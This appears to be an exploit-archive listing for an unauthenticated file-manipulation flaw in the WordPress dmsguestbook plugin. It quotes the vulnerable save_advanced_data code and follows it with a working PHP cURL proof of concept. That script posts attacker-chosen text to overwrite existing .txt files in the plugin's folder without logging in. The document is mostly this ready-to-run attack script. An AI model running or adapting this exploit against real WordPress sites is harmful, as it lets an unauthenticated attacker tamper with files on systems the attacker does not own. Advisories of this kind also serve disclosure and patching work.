WordPress Dmsguestbook Unauthenticated Data Injection



EKU-ID: 4467 CVE: OSVDB-ID:
Author: Evex Published: 2014-12-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


http://packetstormsecurity.com/user/evex/
Author:Evex
Title:
WordPress dmsguestbook Plugin File Manipulation
Description:
wordpress dmsguestbook plugin is vulnerable to a file manipulation security
issue
it allows an unauthenicated attacker to put text into existing text files
only
<?php
/*
Vulnerability Code:
    if ($POSTVARIABLE['action'] =='save_advanced_data') {

    $abspath = str_replace("\\","/", ABSPATH);

    // check the folder variable
    if($POSTVARIABLE['folder']=="language/"){
    $folder="language/";
    } else {$folder="";}

    // check the file variable xxxx.txt
    if(preg_match('/^[a-z0-9]+\.+(txt)/i', $POSTVARIABLE['file'])==1) {
    $file=$POSTVARIABLE['file'];
    } else {$file="";}

        clearstatcache();
        if (file_exists($abspath . "wp-content/plugins/dmsguestbook/" .
$folder . $file)) {
        $handle = fopen($abspath . "wp-content/plugins/dmsguestbook/" .
$folder . $file, "w");
        $writetofile = str_replace("\\", "",
$POSTVARIABLE['advanced_data']);
        fwrite($handle, $writetofile);
        fclose($handle);
        message("<b>" . __("saved", "dmsguestbook") . "...</b>",300,800);
        } else {message("<br /><b>" . __("File not found!", "dmsguestbook")
. "</b>",300,800);}
    }
*/

$TEXTTOINJECT = 'INPUT TEXT HERE';
$TXTFILE = 'readme.txt'; #
localhost/wp-content/plugins/dmsguestbook/readme.txt
$url = "http://localhost/x/wordpress";
$ch = curl_init();
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,"action=save_advanced_data&file=$TXTFILE&advanced_data=$TEXTTOINJECT");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_URL,$url.'/wp-admin/admin.php?page=dmsguestbook');
curl_exec($ch);
echo "Payload Sent\nUrl: $url/wp-content/plugins/dmsguestbook/readme.txt";
?>